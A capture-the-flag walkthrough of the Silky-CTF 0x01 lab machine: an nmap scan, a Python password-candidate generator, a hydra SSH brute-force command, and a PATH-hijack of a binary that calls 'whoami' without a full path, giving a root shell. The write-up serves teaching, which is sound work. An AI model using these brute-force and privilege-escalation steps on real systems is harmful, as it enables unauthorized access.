You can download it here: https://www.vulnhub.com/entry/silky-ctf-0x01,306/

Use nmap to do a thorough port scan.

root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.141
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 10:17 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating ARP Ping Scan at 10:17
Scanning 192.168.227.141 [1 port]
Completed ARP Ping Scan at 10:17, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:17
Completed Parallel DNS resolution of 1 host. at 10:17, 0.01s elapsed
Initiating SYN Stealth Scan at 10:17
Scanning 192.168.227.141 [65535 ports]
Discovered open port 80/tcp on 192.168.227.141
Discovered open port 22/tcp on 192.168.227.141
Completed SYN Stealth Scan at 10:17, 2.05s elapsed (65535 total ports)
Initiating Service scan at 10:17
Scanning 2 services on 192.168.227.141
Completed Service scan at 10:17, 6.07s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.141
NSE: Script scanning 192.168.227.141.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.10s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Nmap scan report for 192.168.227.141
Host is up (0.0026s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 49:e6:fa:4c:d5:60:06:3b:c0:a8:c9:cc:00:10:7e:04 (RSA)
| 256 29:1b:39:69:32:aa:ae:9f:72:83:29:d4:27:db:f8:af (ECDSA)
|_ 256 a0:05:9e:82:bc:9d:09:ce:8e:c5:40:b2:b2:93:c6:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/notes.txt
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:CD:D8:28 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.203 days (since Sun Jun 9 05:25:28 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.61 ms 192.168.227.141

NSE: Script Post-scanning.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Check its HTTP service (port 80).

It’s just the default page for Apache. Check the notes.txt listed in robots.txt.

Is there a credential leak? I checked the default page again and found this.

“s1lKy”: I guess that is the password (with two characters missing), so write a script to generate all possible passwords.

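from string import ascii_letters, digits, punctuation

# Candidate characters for the two missing positions
charset = ascii_letters + digits + punctuation
for i in charset:
    for j in charset:
        print("s1lKy" + i + j)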

Then use hydra to brute-force the SSH password.

hydra -l silky -P pass.txt -t 8 192.168.227.141 ssh

Actually, I brute-forced the password for root at first but never got it; then I took a look at the VM and noticed that there is another user, “silky” (it took me 4 hours in total just to brute-force one password).

Then I successfully got the password for silky: s1lKy#5

Connect to the SSH service.

I walked around and found something interesting in .bash_history.

OK, go and check sky.c. It was not found; I guess it was deleted, but I found the compiled file /usr/bin/sky.

I have no idea what it is doing, so download it and throw it into IDA Pro.

int __cdecl main(int argc, const char **argv, const char **envp)
{
    system("echo 'Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. \ngezeichnet:'; whoami");
    return 0;
}

Quite clear: system() runs whoami without an absolute path, so modifying the $PATH variable gets a root shell.

echo "/bin/sh" > whoami
chmod +x whoami
PATH="/home/silky:$PATH"
/usr/bin/sky
